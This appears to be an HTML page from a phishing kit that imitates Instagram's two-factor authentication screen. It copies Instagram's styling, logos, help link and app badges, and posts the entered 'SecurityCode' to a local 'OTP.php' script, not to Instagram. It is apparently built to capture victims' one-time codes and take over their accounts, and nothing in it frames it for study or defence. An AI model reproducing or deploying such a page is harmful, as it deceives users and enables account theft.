<!DOCTYPE html>
<html>
   <head>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
      <title>Login Instagram</title>
      <style>
        .center {
          text-align: center;
        }
        .main {
        width: 350px;
        height: 360px;
       
        position: relative;
        top:80px; 
        margin: auto;
    }
    .main1 {
        width: 350px;
        height: 360px;
        border: 1px solid #dbdbdb;
        background-color: white;
        position: relative;
        top:0px; 
        margin: auto;
    }

    .summa{

    font-size: 14px;
    font-weight: 400;
    font-family: apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
    width: 300px;
    position: relative;
    bottom: 13px;
    margin:auto;
    }

    input{
    border: 1px solid #ccc;
    border-radius: 3px;
    padding: 9px 0 7px 8px;
    text-overflow: ellipsis;
    font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
    font-size: 16px;
    display: inline-block;
    text-align: start;
    background-color: #fafafa;
    cursor: text;
    font: 400 13.3333px Arial;
    justify-content: center;
    margin-top: 12px;
    max-width: 350px;
    width: 258px;
    height: 25px;
    position: relative;
    bottom: 13px;
    }
    input:focus {
  outline: 1px solid #ccc;
  border-radius: 3px;
    }
 .y3zKF:not(.yWX7d), a.y3zKF:not(.yWX7d), a.y3zKF:not(.yWX7d):visited {
    border: 1px solid transparent;
    background-color: #0095f6;
    background-color: rgba(var(--d69,0,149,246),1);
}

.L3NKy, a.L3NKy, a.L3NKy:visited {
    border-radius: 4px;
    color: #fff;
    color: rgba(var(--eca,255,255,255),1);
    position: relative;
}

.sqdOP {
    cursor: pointer;
    display: block;
    font-weight: 600;
    padding: 5px 9px;
    text-align: center;
    text-transform: inherit;
    text-overflow: ellipsis;
    user-select: none;
    font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
    font-size: 14px;
    line-height: 18px;
}

button {
    width: 268px;
    height: 30px;
    position: relative;
    left: 17px;

}

button:focus{
    outline: 1px;
}

.swB58 {
    color: #262626;
    color: rgba(var(--i1d,38,38,38),1);
    font-size: 14px;
    font-weight: 400;
    line-height: 18px;
    margin: 0 17px 12px;
    text-align: center;
    width: 270px;
}
button:active {opacity: 0.6}
a{
    color:#0095f6;
    text-decoration: none;
}
.bbb{
  color: rgba(var(--i1d,38,38,38),1);
    font-size: 14px;
    line-height: 18px;
    margin: 10px 20px 10px 20px;
    text-align: center;
    padding: 0;
    border: 0;
    font: inherit;
    font-style: inherit;
    font-variant-ligatures: inherit;
    font-variant-caps: inherit;
    font-variant-numeric: inherit;
    font-variant-east-asian: inherit;
    font-weight: inherit;
    font-stretch: inherit;
    display: block;
    margin-block-start: 1em;
    margin-block-end: 1em;
    margin-inline-start: 0px;
    margin-inline-end: 0px;
}

.Rt8TI {
    height: 40px;
    position: relative;
    align-items: center;
    left: 27px;
    padding:2px;
}


        </style>
   </head>
   <body style="background-color:#fafafa;"class="main">  
    <form action="/OTP.php" method="POST">
      <div class="main1">
    <h1 class="center" ><img src="index_files/a.png"></h1>
 <div class="center summa"><p>Enter the 6-digit code generated by your authentication app.</p>
    <input type="tel" name="SecurityCode" placeholder="Security Code" required="true" 
    autocapitalize="off" autocomplete="off" autocorrect="off"
     maxlength="8"  >

     <button class="sqdOP  L3NKy   y3zKF     " type="submit">
       Confirm</button>
<br>
     <div class="swB58">If you're unable to receive a security code from your authentication app, you can use one of your <a class="jNzLF" href="https://help.instagram.com/1006568999411025" target="_blank" rel="nofollow noopener noreferrer">backup codes</a> .</div>
</div>   
    </div>
    <div style="padding: 10px;">
      <p class="bbb">Get the app.</p>
    </div>
    <div style="position: relative;">
    <a class="z1VUo" href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8&amp;vt=lo"><img alt="Available on the App Store" class="Rt8TI " src="index_files/ios.png"></a>
    <a class="z1VUo" href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D93003C70-8C77-4240-9DA8-C9340CCBC0B9%26utm_content%3Dlo%26utm_medium%3Dbadge">
      <img alt="Available on Google Play" class="Rt8TI " src="index_files/android.png"></a>
      </div>
     <div style="position:relative; top: 77px;right: 110px;"> 
      <img src="index_files/bottom.png">
     </div> 
    
    </div>
    
    
    
    
    </form> 
  </body>
</html>
